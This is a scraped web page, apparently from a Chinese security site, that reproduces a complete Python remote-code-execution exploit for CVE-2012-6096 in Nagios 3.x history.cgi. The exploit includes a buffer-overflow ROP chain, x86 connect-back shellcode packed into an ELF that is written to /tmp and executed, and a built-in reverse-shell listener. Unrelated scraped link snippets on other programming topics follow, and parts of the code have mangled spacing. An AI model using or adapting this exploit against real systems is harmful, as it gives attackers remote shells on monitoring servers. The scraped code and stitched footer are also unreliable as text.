Nagios 3.x Remote Command Execution

测试方法:

程序(方法)可能带有攻击性,仅供安全研究与教学之用,风险自负! 
  1 #!/usr/bin/python

  2 #

  3 # CVE-2012-6096 - Nagios history.cgi Remote Command Execution

  4 # ===========================================================

  5 # Another year, another reincarnation of classic and trivial

  6 # bugs to exploit. This time we attack Nagios.. or more

  7 # specifically, one of its CGI scripts. [1]

  8 #

  9 # The Nagios code is an amazing monster. It reminds me a

 10 # lot of some of my early experiments in C, back when I

 11 # still had no clue what I was doing. (Ok, fair enough,

 12 # I still don't, heheh.)

 13 #

 14 # Ok, I'll come clean. This exploit doesn't exactly

 15 # defeat FORTIFY. This approach is likely to work just FINE

 16 # on other crippled distro's though, think of stuff like

 17 # ArchLinux, Slackware, and all those Gentoo kids twiddling

 18 # their CFLAGS. [2] (Oh and hey, BSD and stuff!)

 19 #

 20 # I do some very stupid shit(tm) here that might make an

 21 # exploit coder or two cringe. My sincere apologies for that.

 22 #

 23 # Cold beer goes out to my friends who are still practicing

 24 # this dying but interesting type of art:

 25 #

 26 # * brainsmoke * masc * iZsh * skier_ * steve *

 27 #

 28 # -- blasty <[email protected]> / 2013-01-08

 29 #

 30 # References:

 31 # [1] http://permalink.gmane.org/gmane.comp.security.oss.general/9109

 32 # [2] http://www.funroll-loops.info/

 33 #

 34 # P.S. To the clown who rebranded my Samba exploit: j00 s0 1337 m4n!

 35 # Next time you rebrand an exploit at least show some diligence and

 36 # add some additional targets or improvements, so we can all profit!

 37 #

 38 # P.P.S. hey, Im not _burning_ bugs .. this is a 2day, enjoy!

 39 #

 40 import os, sys, socket,struct, urllib, threading,SocketServer, time

 41 from base64 import b64encode

 42 SocketServer.TCPServer.allow_reuse_address =True

 43 targets =[

 44 {

 45 "name":"Debian (nagios3_3.0.6-4~lenny2_i386.deb)",

 46 "smash_len":0xc37,

 47 "unescape":0x0804b620,

 48 "popret":0x08048fe4,

 49 "hostbuf":0x080727a0,

 50 "system_plt":0x08048c7c

 51 }

 52 ]

 53 def u32h(v):

 54 returnstruct.pack("<L", v).encode('hex')

 55 def u32(v, hex =False):

 56 returnstruct.pack("<L", v)

 57 # Tiny ELF stub based on:

 58 # http://www.muppetlabs.com/~breadbox/software/tiny/teensy.html

 59 def make_elf(sc):

 60 elf_head = \

 61 "7f454c46010101000000000000000000"+ \

 62 "02000300010000005480040834000000"+ \

 63 "00000000000000003400200001000000"+ \

 64 "00000000010000000000000000800408"+ \

 65 "00800408"+ u32h(0x54+len(sc))*2+ \

 66 "0500000000100000"

 67 return elf_head.decode("hex")+ sc

 68 # interactive connectback listener

 69 class connectback_shell(SocketServer.BaseRequestHandler):

 70 def handle(self):

 71 print"\n[!!] K4P0W!@# -> shell from %s"%self.client_address[0]

 72 print"[**] This shell is powered by insane amounts of illegal substances"

 73 s =self.request

 74 import termios, tty,select, os

 75 old_settings = termios.tcgetattr(0)

 76 try:

 77 tty.setcbreak(0)

 78 c =True

 79 os.write(s.fileno(),"id\nuname -a\n")

 80 while c:

 81 for i inselect.select([0, s.fileno()],[],[],0)[0]:

 82 c = os.read(i,1024)

 83 if c:

 84 if i ==0:

 85 os.write(1, c)

 86 os.write(s.fileno()if i ==0else1, c)

 87 exceptKeyboardInterrupt:pass

 88 finally: termios.tcsetattr(0, termios.TCSADRAIN, old_settings)

 89 return

 90 classThreadedTCPServer(SocketServer.ThreadingMixIn,SocketServer.TCPServer):

 91 pass

 92 if len(sys.argv)!=5:

 93 print"\n >> Nagios 3.x CGI remote code execution by <[email protected]>"

 94 print" >> \"Jetzt geht's Nagi-los!\"\n"

 95 print" usage: %s <base_uri> <myip> <myport> <target>\n"%(sys.argv[0])

 96 print" targets:"

 97 i =0

 98 for target in targets:

 99 print" %02d) %s"%(i, target['name'])

100 i = i+1

101 print""

102 sys.exit(-1)

103 target_no =int(sys.argv[4])

104 if target_no <0or target_no > len(targets):

105 print"Invalid target specified"

106 sys.exit(-1)

107 target = targets[int(sys.argv[4])]

108 # comment this shit if you want to setup your own listener

109 server =ThreadedTCPServer((sys.argv[2],int(sys.argv[3])), connectback_shell)

110 server_thread = threading.Thread(target=server.serve_forever)

111 server_thread.daemon =True

112 server_thread.start()

113 # shellcode to be executed

114 # vanilla x86/linux connectback written by a dutch gentleman

115 # close to a decade ago.

116 cback = \

117 "31c031db31c951b10651b10151b10251"+ \

118 "89e1b301b066cd8089c231c031c95151"+ \

119 "68badc0ded6668b0efb102665189e7b3"+ \

120 "1053575289e1b303b066cd8031c939c1"+ \

121 "740631c0b001cd8031c0b03f89d3cd80"+ \

122 "31c0b03f89d3b101cd8031c0b03f89d3"+ \

123 "b102cd8031c031d250686e2f7368682f"+ \

124 "2f626989e3505389e1b00bcd8031c0b0"+ \

125 "01cd80"

126 cback = cback.replace("badc0ded", socket.inet_aton(sys.argv[2]).encode("hex"))

127 cback = cback.replace("b0ef",struct.pack(">H",int(sys.argv[3])).encode("hex"))

128 # Eww.. so there's some characters that dont survive the trip..

129 # yes, even with the unescape() call in our return-chain..

130 # initially I was going to use some /dev/tcp based connectback..

131 # but /dev/tcp isn't available/accesible everywhere, so instead

132 # we drop an ELF into /tmp and execute that. The '>' characters

133 # also doesn't survive the trip so we work around this by using

134 # the tee(1) utility.

135 # If your target has a /tmp that is mounted with noexec flag,

136 # is severely firewalled or guarded by trained (watch)dogs..

137 # you might want to reconsider this approach!

138 cmd = \

139 "rm -rf /tmp/x;"+ \

140 "echo "+ b64encode(make_elf(cback.decode('hex')))+"|"+ \

141 "base64 -d|tee /tmp/x|chmod +x /tmp/x;/tmp/x;"

142 # Spaces (0x20) are also a problem, they always ends up as '+' :-(

143 # so apply some olde trick and rely on $IFS for argv separation

144 cmd = cmd.replace(" ","${IFS}")

145 # Basic return-2-whatever/ROP chain.

146 # We return into cgi_input_unescape() to get rid of

147 # URL escaping in a static buffer we control, and then

148 # we return into system@plt for the moneyshot.

149 #

150 # Ergo sum:

151 # There's no memoryleak or whatever needed to leak libc

152 # base and bypass ASLR.. This entire Nagios PoS is stringed

153 # together by system() calls, so pretty much every single one

154 # of their little silly binaries comes with a PLT entry for

155 # system(), huzzah!

156 rop =[

157 u32(target['unescape']),

158 u32(target['popret']),

159 u32(target['hostbuf']),

160 u32(target['system_plt']),

161 u32(0xdeafbabe),

162 u32(target['hostbuf'])

163 ]

164 # Yes.. urllib, so it supports HTTPS, basic-auth and whatnot

165 # out of the box. Building HTTP requests from scratch is so 90ies..

166 params= urllib.urlencode({

167 'host': cmd +"A"*(target['smash_len']-len(cmd))+"".join(rop)

168 })

169 print"[>>] CL1Q .."

170 f = urllib.urlopen(sys.argv[1]+"/cgi-bin/history.cgi?%s"%params)

171 print"[>>] CL4Q .."

172 f.read()

173 # TRIAL PERIOD ACTIVE, LOL!

174 time.sleep(0x666)

175 server.shutdown()

 

你可能感兴趣的:(command)

  • 下载github patch到本地 小米人er 我的博客gitpatch
    以下是几种从GitHub上下载以.patch结尾的补丁文件的方法:通过浏览器直接下载打开包含该.patch文件的GitHub仓库。在仓库的文件列表中找到对应的.patch文件。点击该文件,浏览器会显示文件的内容,在页面的右上角通常会有一个“Raw”按钮,点击它可以获取原始文件内容。然后在浏览器中使用快捷键(如Ctrl+S或者Command+S)将原始文件保存到本地,选择保存的文件名并确保后缀为.p
  • 1分钟解决 -bash: mvn: command not found,在Centos 7中安装Maven Energet!c 开发语言
    1分钟解决-bash:mvn:commandnotfound,在Centos7中安装Maven检查Java环境1下载Maven2解压Maven3配置环境变量4验证安装5常见问题与注意事项6总结检查Java环境Maven依赖Java环境,请确保系统已经安装了Java并配置了环境变量。可以通过以下命令检查:java-version如果未安装,请先安装Java。1下载Maven从官网下载:前往Apach
  • vue 创建项目报错:command failed: npm install --loglevel error 那鱼、会飞 vue.jsvue-cli3
    这个问题其实很好解决,只是很多种情况,逐一排除即可。稳下心来~vuecli3创建项目我的node版本是node14.15.0,(永远不要尝试最新版本)node各种版本下载地址:以往的版本|Node.js(nodejs.org)vue/[email protected]@vue/[email protected](注意vue/cli2和vue/cli3的下载命名有所改变,2是-形式,3是/形式)其实报错
  • greenplum资源队列 李春田
    文章来源https://www.cnblogs.com/pl-boke/p/9852439.html官方文档:https://gpdb.docs.pivotal.io/6-8/admin_guide/workload_mgmt.html1、创建资源队列语法Command:CREATERESOURCEQUEUEDescription:createanewresourcequeueforworkloa
  • Error - cannot open input file /postproc/nlscfg.inf 错误解决 技术无疆 WindowsCEinputfilecommandwindows
    执行makeimg命令的时候出现一下错误:makeimg:Creatingnlscfg.outbecausenlscfg.infdoesn'texist.makeimg:runcommand:fmerge-nlsnlscfg.outnlscfg.infError-cannotopeninputfile/postproc/nlscfg.inffmergeforWindowsCE(Release)(B
  • QT 自定义组件 界面跳转 子座 qt数据库开发语言
    一、引用组件需要的类(头文件)1、按钮类QPushButton:普通按钮;QToolButton:工具按钮;QRadioButton:单选按钮;QCheckBox:复选按钮;QCommandLinkButton:命令连接按钮;2、布局类QHBoxLayout水平QVBoxLayout垂直QGridLayout网格QFormLayout表单QSrackedLayout.堆栈3、输出类QLabel:标
  • RACCommand frankisbaby
    RACCommand:RAC中用于处理事件的类,可以把事件如何处理,事件中的数据如何传递包装到这个类中,它可以很方便的监控事件的执行过程。使用场景:监听按钮点击事件,网络请求;使用步骤:1.创建命令:RACCommand不能返回一个空的信号:RACCommand*command=[[RACCommandalloc]initWithSignalBlock:^RACSignal*_Nonnull(id
  • appium中遇到WebDriverException: Message: An unknown server-side error occurred while processing the ... Kingtester
    selenium.common.exceptions.WebDriverException:Message:Anunknownserver-sideerroroccurredwhileprocessingthecommand.Originalerror:Anewsessioncouldnotbecreated.Details:sessionnotcreated:pleaseclose'com.te
  • mysql row_number吗_MySQL中的ROW_NUMBER()是什么? 春容 mysqlrow_number吗
    MySQL版本8.0中包含的Row_NUMBER()。这是一种窗口函数。这可用于为行分配序列号。要了解,请借助CREATEpcommand创建一个表-建立表格CREATEtablerowNumberDemo->(->FirstNamevarchar(100)->);插入记录INSERTintorowNumberDemovalues('john');INSERTintorowNumberDemova
  • Swift基础语法 huang1233 Swiftswift
    print("HelloSwift").不用编写main函数,Swift将全局范围内的首句可执行作为程序入口.一句代码尾部可以省略分号(;),多句代码写在同一行时必须用分号(;)隔开.用var定义变量,let定义常量,编译器能自动推断出变量\常量的类型leta=10letb=20varc=a+b+10c+=30Playground可以快速预览代码效果,是学习语法的好帮手Command+Shift+
  • 如何利用命令模式实现一个手游后端架构? 隔窗听雨眠 命令模式
    命令模式的原理解读命令模式的英文翻译是CommandDesignPattern。在GoF的《设计模式》一书中,它是这么定义的:Thecommandpatternencapsulatesarequestasanobject,therebylettingusparameterizeotherobjectswithdifferentrequests,queueorlogrequests,andsuppo
  • 【时时三省】tessy 自动化执行用例:Command line interface(命令行接口) 时时三省 &&集成测试自动化运维
    目录1,总体介绍2,前提条件3,使用bat脚本运行的整体流程4,tessy命令行脚本格式1,整体格式
  • 喜大普奔:HashiCorp Vagrant 2.2.0发布! HashiCorpChina
    OCT172018BRIANCAINWearepleasedtoannouncethereleaseofVagrant2.2.0.Vagrantisatoolforbuildinganddistributingdevelopmentenvironments.ThehighlightofthisreleaseistheintroductionofVagrantCloudcommandlinetool
  • Xcode 使用技巧,呜呜方法3真的让我效率提升100倍 温正实 xcodemacoside
    如何快速查找代码里定义的方法ChatGPT说:ChatGPT在Xcode中,有几种快速查找方法的方式:1.使用Command+Shift+O快速查找文件或方法按下Command+Shift+O,然后开始输入方法名或类名,Xcode会自动搜索项目中相关的方法、类或文件。你可以直接输入方法名(例如:updateParentHeight),它会列出匹配的内容。2.使用“跳转栏”快速跳转在Xcode界面顶
  • supervisor环境变量 蕴重Liu
    场景:supervisor启动flask失败,手动python启动成功,报错信息是缺少ModuleNotFoundError配置文件:[program:aib-humanpose]environment=PYTHONPATH=/root/anaconda3/lib/python3.6/site-packagescommand=/root/anaconda3/bin/pythongateway_b_
  • 配置QT程序的命令行参数 码农飞飞 QT+QMLqtui开发语言json
    在开发一些非UI程序的时候,我们习惯通过命令行参数给程序传递一些配置项和参数。这时候在程序里面解析这些配置项和参数就成了一个让人头疼的问题。其实针对QT命令行参数的解析,QT提供了现成的工具类QCommandLineParser,通过使用工具类可以极大的简化我们解析命令行参数的工作量。这里介绍一下命令行参数解析类的使用方法。获取程序的版本信息对于一些通用产品,比如git或者electron等等我们
  • Python 对话框 houyanhua1 Pythonpython
    #coding=utf-8#对话框fromtkinterimport*importtkinter.messageboxasmb#给导入的包指定一个别名classApp:def__init__(self,master):frame=Frame(master)frame.pack()button=Button(frame,text='点击',command=self.info)button.grid(
  • 提示execCommand 被弃用?JS点击复制文字的替代办法 不会做饭的程序员 小知识JS随笔safari前端
    前端在页面实现点击复制功能,一般都会使用document.execCommand;虽然现在还能用,但是会提示你即将被废弃,找了一个替代方法,基于Promise,不用像execCommand一样还得选中范围;看了一下兼容性也挺不错的navigator.clipboard.writeText(value);navigator.clipboard.writeText(value).then(()=>{}
  • 设计模式扫荡-行为型模式-责任链、命令、迭代器、备忘录、观察者、状态、策略、模板、访问者 JunSIr_# 面向对象设计模式责任链命令观察者备忘录
    设计模式扫荡-行为型模式-责任链、命令、迭代器、备忘录、观察者、状态、策略、模板、访问者文章目录设计模式扫荡-行为型模式-责任链、命令、迭代器、备忘录、观察者、状态、策略、模板、访问者责任链模式(ChainofResponsibilityPattern)命令模式(CommandPattern)迭代器模式(IteratorPattern)备忘录模式(MementoPattern)观察者模式(Obse
  • python调用shell命令-「Python」6种python中执行shell命令方法 weixin_37988176
    用Python调用Shell命令有如下几种方式:第一种:os.system("Thecommandyouwant").这个调用相当直接,且是同步进行的,程序需要阻塞并等待返回。返回值是依赖于系统的,直接返回系统的调用返回值,所以windows和linux是不一样的。第二种:os.popen(command[,mode[,bufsize]])先给大家看个例子可以看出,popen方法通过p.read(
  • Linux:vim详解及使用 C+五条 Linuxvim编辑器linux
    一、什么是vimvim的三种模式(其实有好多模式,目前掌握这3种即可),分别是命令模式(commandmode)、插入模式(Insertmode)和底行模式(lastlinemode),各模式的功能区分如下:1、正常/普通/命令模式(Normalmode)控制屏幕光标的移动,字符、字或行的删除,移动复制某区段及进入Insertmode下,或者到lastlinemode2、插入模式(Insertmo
  • man命令学习记录 天南地北飞 linux基础学习学习linux运维
    使用man来查看命令的用法manls想了解Linux命令的用法假设你想查ls命令的更多信息,输入manls,就会打开manpage(man是manual的缩写,因此manpage就是“手册页面”),显示关于ls命令各个方面的信息。通常,manpage是由编写程序的开发人员编写的。使用这个命令并不难,只需要输入man,后面再跟上你想要了解的命令。$manlsLS(1)UserCommandsLS(1
  • mac java 8卸载_[macOS]macOS上卸载Java9 重装Java8 V6火箭 macjava8卸载
    [TOC]0x00场景装了Java9,但是发现不少应用不支持,没办法,卸载。0x01探索查看java版本java--versionorjava-version查看Java路径whichjava显示结果:/usr/bin/java。进入目录/usr/bin/,定位到原始位置/System/Library/Frameworks/JavaVM.framework/Versions/A/Commands。
  • 现代系统设计风格概览 小技术君
    现代系统设计风格整理如下:1.CQRSArchitecture(CommandQueryResponsibilitySegregation):将数据存储的读写操作分开,实现读写工作负载的独立扩展和优化。2.Layered(n-tier)Architecture:将软件按照逻辑层次划分,通常分为业务层、数据层等。3.OrchestrationArchitecture:采用中央协调器(通常称为编排器)
  • .Net 执行Linux下多行shell命令方法 xk_hypothesis Asp.NetCoreC#.netlinux
    1.编写执行给定的多行shell命令方法publicclassShellCommandExecutor{//////执行给定的多行shell命令//////多行shell命令publicvoidExecuteMultiLineShellCommands(stringcommands){//确保所有换行符都是LF(\n)stringnormalizedCommands=NormalizeNewlin
  • gdb 调试,如何让一个断点 “平时不触发,在触发 2000 次后,gdb 进入调试模式” ? shimly123456 chrome前端
    这里需要结合breakpoint和commands两个命令一起使用首先先使用break给某个行号、地址、或者函数打断电,命令如下:breakmy_function随后使用commands命令,给这个断点设置命令(即,断点触发时的命令)(gdb)breakmy_functionBreakpoint1at0x4005d6:filemy_program.cpp,line10.(gdb)commands1
  • 成功解决 -bash:***: command not found 方永 Linuxbashcentoslinux
    1、获取系统环境路径[root@centos~]#echo$PATH/usr/local/sbin:/usr/local/bin:/sbin:/bin:/usr/sbin:/usr/bin:/root/bin2、修改~/.bash_profile,在最后添加环境变量[root@centos~]#cd~[root@centos~]#vim~/.bash_profile###在底部加上上面获取的路径e
  • 【.NET全栈】ASP.NET开发Web应用——ADO.NET数据访问技术 JosieBook #.NET全栈.netasp.net前端
    文章目录前言一、ADO.NET基础1、ADO.NET架构2、ADO.NET数据提供者二、连接数据库1、SqlConnection数据库连接类2、使用SqlConnectionStringBuilder连接字符串3、关闭和释放连接4、在web.config配置文件中保存连接字符串5、连接池技术三、与数据库交互1、使用SqlCommand操作数据库2、为SqlCommand传递参数3、使用SqlCom
  • VSCode学习笔记 songyuc 学习笔记
    1.快捷键KeyDescriptionPlatformF1打开命令面板(CommandPalette)Win10Shift+Delete剪切当前光标所在的代码行Win102.文件2.1在文件列表中定位当前文件操作路径:右键单击文件名⇒在右键菜单中点击【RevealinExplorerView】
  • 手把手教你用Python部署自己的VPN_python strongswan 2401_84970250 程序员pythonjava网络
    }#构建VPN连接命令_command=["sudo","strongswan","up",_config["username"],"--server",_config["server_ip"],"--username",_config["username"],"--password",_config["password"]]#启动VPN连接subprocess.run(_command)defs
  • 设计模式介绍 tntxia 设计模式
    设计模式来源于土木工程师 克里斯托弗 亚历山大(http://en.wikipedia.org/wiki/Christopher_Alexander)的早期作品。他经常发表一些作品,内容是总结他在解决设计问题方面的经验,以及这些知识与城市和建筑模式之间有何关联。有一天,亚历山大突然发现,重复使用这些模式可以让某些设计构造取得我们期望的最佳效果。 亚历山大与萨拉-石川佳纯和穆雷 西乐弗斯坦合作
  • android高级组件使用(一) 百合不是茶 androidRatingBarSpinner
    1、自动完成文本框(AutoCompleteTextView) AutoCompleteTextView从EditText派生出来,实际上也是一个文本编辑框,但它比普通编辑框多一个功能:当用户输入一个字符后,自动完成文本框会显示一个下拉菜单,供用户从中选择,当用户选择某个菜单项之后,AutoCompleteTextView按用户选择自动填写该文本框。 使用AutoCompleteTex
  • [网络与通讯]路由器市场大有潜力可挖掘 comsci 网络
              如果国内的电子厂商和计算机设备厂商觉得手机市场已经有点饱和了,那么可以考虑一下交换机和路由器市场的进入问题.....        这方面的技术和知识,目前处在一个开放型的状态,有利于各类小型电子企业进入  &nbs
  • 自写简单Redis内存统计shell 商人shang Linux shell统计Redis内存
    #!/bin/bash address="192.168.150.128:6666,192.168.150.128:6666" hosts=(${address//,/ }) sfile="staticts.log" for hostitem in ${hosts[@]} do ipport=(${hostitem
  • 单例模式(饿汉 vs懒汉) oloz 单例模式
    package 单例模式; /* * 应用场景:保证在整个应用之中某个对象的实例只有一个 * 单例模式种的《 懒汉模式》 * */ public class Singleton { //01 将构造方法私有化,外界就无法用new Singleton()的方式获得实例 private Singleton(){}; //02 申明类得唯一实例 priva
  • springMvc json支持 杨白白 json springmvc
    1.Spring mvc处理json需要使用jackson的类库,因此需要先引入jackson包 2在spring mvc中解析输入为json格式的数据:使用@RequestBody来设置输入 @RequestMapping("helloJson") public @ResponseBody JsonTest helloJson() {
  • android播放,掃描添加本地音頻文件 小桔子
            最近幾乎沒有什麽事情,繼續鼓搗我的小東西。想在項目中加入一個簡易的音樂播放器功能,就像華為p6桌面上那麼大小的音樂播放器。用過天天動聽或者QQ音樂播放器的人都知道,可已通過本地掃描添加歌曲。不知道他們是怎麼實現的,我覺得應該掃描設備上的所有文件,過濾出音頻文件,每個文件實例化為一個實體,記錄文件名、路徑、歌手、類型、大小等信息。具體算法思想,
  • oracle常用命令 aichenglong oracledba常用命令
    1 创建临时表空间 create temporary tablespace user_temp  tempfile 'D:\oracle\oradata\Oracle9i\user_temp.dbf' size 50m  autoextend on  next 50m maxsize 20480m  extent management local
  • 25个Eclipse插件 AILIKES eclipse插件
    提高代码质量的插件1. FindBugsFindBugs可以帮你找到Java代码中的bug,它使用Lesser GNU Public License的自由软件许可。2. CheckstyleCheckstyle插件可以集成到Eclipse IDE中去,能确保Java代码遵循标准代码样式。3. ECLemmaECLemma是一款拥有Eclipse Public License许可的免费工具,它提供了
  • Spring MVC拦截器+注解方式实现防止表单重复提交 baalwolf spring mvc
    原理:在新建页面中Session保存token随机码,当保存时验证,通过后删除,当再次点击保存时由于服务器端的Session中已经不存在了,所有无法验证通过。   1.新建注解:   ? 1 2 3 4 5 6 7 8 9 10 11 12 13 14 15 16 17 18
  • 《Javascript高级程序设计(第3版)》闭包理解 bijian1013 JavaScript
    “闭包是指有权访问另一个函数作用域中的变量的函数。”--《Javascript高级程序设计(第3版)》         看以下代码: <script type="text/javascript"> function outer() { var i = 10; return f
  • AngularJS Module类的方法 bijian1013 JavaScriptAngularJSModule
            AngularJS中的Module类负责定义应用如何启动,它还可以通过声明的方式定义应用中的各个片段。我们来看看它是如何实现这些功能的。 一.Main方法在哪里         如果你是从Java或者Python编程语言转过来的,那么你可能很想知道AngularJS里面的main方法在哪里?这个把所
  • [Maven学习笔记七]Maven插件和目标 bit1129 maven插件
    插件(plugin)和目标(goal) Maven,就其本质而言,是一个插件执行框架,Maven的每个目标的执行逻辑都是由插件来完成的,一个插件可以有1个或者几个目标,比如maven-compiler-plugin插件包含compile和testCompile,即maven-compiler-plugin提供了源代码编译和测试源代码编译的两个目标   使用插件和目标使得我们可以干预
  • 【Hadoop八】Yarn的资源调度策略 bit1129 hadoop
    1. Hadoop的三种调度策略 Hadoop提供了3中作业调用的策略, FIFO Scheduler Fair Scheduler Capacity Scheduler 以上三种调度算法,在Hadoop MR1中就引入了,在Yarn中对它们进行了改进和完善.Fair和Capacity Scheduler用于多用户共享的资源调度   2. 多用户资源共享的调度
  • Nginx使用Linux内存加速静态文件访问 ronin47
    Nginx是一个非常出色的静态资源web服务器。如果你嫌它还不够快,可以把放在磁盘中的文件,映射到内存中,减少高并发下的磁盘IO。 先做几个假设。nginx.conf中所配置站点的路径是/home/wwwroot/res,站点所对应文件原始存储路径:/opt/web/res shell脚本非常简单,思路就是拷贝资源文件到内存中,然后在把网站的静态文件链接指向到内存中即可。具体如下:
  • 关于Unity3D中的Shader的知识 brotherlamp unityunity资料unity教程unity视频unity自学
    首先先解释下Unity3D的Shader,Unity里面的Shaders是使用一种叫ShaderLab的语言编写的,它同微软的FX文件或者NVIDIA的CgFX有些类似。传统意义上的vertex shader和pixel shader还是使用标准的Cg/HLSL 编程语言编写的。因此Unity文档里面的Shader,都是指用ShaderLab编写的代码,然后我们来看下Unity3D自带的60多个S
  • CopyOnWriteArrayList vs ArrayList bylijinnan java
    package com.ljn.base; import java.util.ArrayList; import java.util.Iterator; import java.util.List; import java.util.concurrent.CopyOnWriteArrayList; /** * 总述: * 1.ArrayListi不是线程安全的,CopyO
  • 内存中栈和堆的区别 chicony 内存
    1、内存分配方面:     堆:一般由程序员分配释放, 若程序员不释放,程序结束时可能由OS回收 。注意它与数据结构中的堆是两回事,分配方式是类似于链表。可能用到的关键字如下:new、malloc、delete、free等等。     栈:由编译器(Compiler)自动分配释放,存放函数的参数值,局部变量的值等。其操作方式类似于数据结构中
  • 回答一位网友对Scala的提问 chenchao051 scalamap
    本来准备在私信里直接回复了,但是发现不太方便,就简要回答在这里。 问题 写道 对于scala的简洁十分佩服,但又觉得比较晦涩,例如一例,Map("a" -> List(11,111)).flatMap(_._2),可否说下最后那个函数做了什么,真正在开发的时候也会如此简洁?谢谢    先回答一点,在实际使用中,Scala毫无疑问就是这么简单。
  • mysql 取每组前几条记录 daizj mysql分组最大值最小值每组三条记录
    一、对分组的记录取前N条记录:例如:取每组的前3条最大的记录 1.用子查询: SELECT * FROM tableName a  WHERE 3> (SELECT COUNT(*) FROM  tableName b WHERE b.id=a.id AND b.cnt>a. cnt) ORDER BY a.id,a.account DE
  • HTTP深入浅出 http请求 dcj3sjt126com http
      HTTP(HyperText Transfer Protocol)是一套计算机通过网络进行通信的规则。计算机专家设计出HTTP,使HTTP客户(如Web浏览器)能够从HTTP服务器(Web服务器)请求信息和服务,HTTP目前协议的版本是1.1.HTTP是一种无状态的协议,无状态是指Web浏览器和Web服务器之间不需要建立持久的连接,这意味着当一个客户端向服务器端发出请求,然后We
  • 判断MySQL记录是否存在方法比较 dcj3sjt126com mysql
    把数据写入到数据库的时,常常会碰到先要检测要插入的记录是否存在,然后决定是否要写入。   我这里总结了判断记录是否存在的常用方法:   sql语句: select   count ( * )  from  tablename;   然后读取count(*)的值判断记录是否存在。对于这种方法性能上有些浪费,我们只是想判断记录记录是否存在,没有必要全部都查出来。
  • 对HTML XML的一点认识 e200702084 htmlxml
    感谢http://www.w3school.com.cn提供的资料 HTML 文档中的每个成分都是一个节点。 节点 根据 DOM,HTML 文档中的每个成分都是一个节点。 DOM 是这样规定的: 整个文档是一个文档节点 每个 HTML 标签是一个元素节点 包含在 HTML 元素中的文本是文本节点 每一个 HTML 属性是一个属性节点 注释属于注释节点 Node 层次
  • jquery分页插件 genaiwei jqueryWeb前端分页插件
    //jquery页码控件// 创建一个闭包    (function($) {      // 插件的定义      $.fn.pageTool = function(options) {        var totalPa
  • Mybatis与Ibatis对照入门于学习 Josh_Persistence mybatisibatis区别联系
    一、为什么使用IBatis/Mybatis         对于从事 Java EE 的开发人员来说,iBatis 是一个再熟悉不过的持久层框架了,在 Hibernate、JPA 这样的一站式对象 / 关系映射(O/R Mapping)解决方案盛行之前,iBaits 基本是持久层框架的不二选择。即使在持久层框架层出不穷的今天,iBatis 凭借着易学易用、
  • C中怎样合理决定使用那种整数类型? 秋风扫落叶 c数据类型
    如果需要大数值(大于32767或小于32767), 使用long 型。 否则, 如果空间很重要 (如有大数组或很多结构), 使用 short 型。 除此之外, 就使用 int 型。 如果严格定义的溢出特征很重要而负值无关紧要, 或者你希望在操作二进制位和字节时避免符号扩展的问题, 请使用对应的无符号类型。 但是, 要注意在表达式中混用有符号和无符号值的情况。    &nbs
  • maven问题 zhb8015 maven问题
      问题1: Eclipse 中 新建maven项目 无法添加src/main/java 问题    eclipse创建maevn web项目,在选择maven_archetype_web原型后,默认只有src/main/resources这个Source Floder。     按照maven目录结构,添加src/main/ja
  • (二)androidpn-server tomcat版源码解析之--push消息处理 spjich javaandrodipn推送
    在 (一)androidpn-server tomcat版源码解析之--项目启动这篇中,已经描述了整个推送服务器的启动过程,并且把握到了消息的入口即XmppIoHandler这个类,今天我将继续往下分析下面的核心代码,主要分为3大块,链接创建,消息的发送,链接关闭。 先贴一段XmppIoHandler的部分代码 /** * Invoked from an I/O proc
  • 用js中的formData类型解决ajax提交表单时文件不能被serialize方法序列化的问题 中华好儿孙 JavaScriptAjaxWeb上传文件FormData
    var formData = new FormData($("#inputFileForm")[0]); $.ajax({ type:'post', url:webRoot+"/electronicContractUrl/webapp/uploadfile", data:formData, async: false, ca
  • mybatis常用jdbcType数据类型 ysj5125094 mybatismapperjdbcType
      MyBatis 通过包含的jdbcType 类型 BIT         FLOAT      CHAR          
按字母分类: ABCDEFGHIJKLMNOPQRSTUVWXYZ其他